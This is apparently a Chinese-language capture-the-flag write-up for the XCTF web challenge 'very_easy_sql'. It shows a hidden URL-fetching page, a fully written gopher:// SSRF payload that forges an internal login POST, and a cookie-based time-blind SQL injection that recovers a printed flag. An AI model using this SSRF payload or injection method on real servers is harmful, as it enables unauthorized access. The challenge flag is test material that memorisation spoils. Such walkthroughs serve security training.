[GFSJ1008] xctf，Web，难度:3，very_easy_sql
题目来源: CTF
题目描述: 太简单了不描述了，给sql签个到吧
题目场景: http://61.147.171.105:55928

https://blog.csdn.net/xulei1132562/article/details/126541635
打开场景，显示页面：
[uname           ]
[passwd          ]
<Submit>
you are not an inner user, so we can not let you have identify~

查看页面源代码，在页面后半部发现
<!-- use.php -->
构造 http://61.147.171.105:55928/use.php 得到
url you want to curl:
[url             ]
<Submit>

构造 http://61.147.171.105:55928/use.php?url=127.0.0.1/use.php 得到
url you want to curl:
[url             ]
<Submit>
url you want to curl:
[url             ]
<Submit>

构造 SSRF 语句从内部访问
$ python ssrf.py
gopher://127.0.0.1:80/_%250D%250APOST%2520/index.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AUser-Agent%253A%2520curl/7.43.0%250D%250AAccept%253A%2520%252A/%252A%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252024%250D%250A%250D%250Auname%253Dadmin%2526passwd%253Dadmin%250D%250A

启动 Burp Suite，使用 Repeater，将 Request 第1行的
127.0.0.1/use.php 替换为上述 SSRF 语句
点击 <Send> 按钮，在 Response 页面发现
Set-Cookie: this_is_your_cookie=YWRtaW4%3D; expires=Wed, 24-May-2023 23:39:22 GMT; Max-Age=3600
注入点在 Cookie，通过使用时间盲注payload然后再base64转码，编写盲注脚本
关闭 Burp Suite，运行以下 Python 程序破解：
$ python solve.py
c
cy
...
cyberpeace{2e27b451d5c47f08a398fdde91dcdec0}
提交答案，成功！


https://www.freebuf.com/articles/web/260806.html
SSRF（Server-Side Request Forgery:服务器端请求伪造）是
一种由攻击者构造形成并由服务端发起恶意请求的一个安全漏洞。
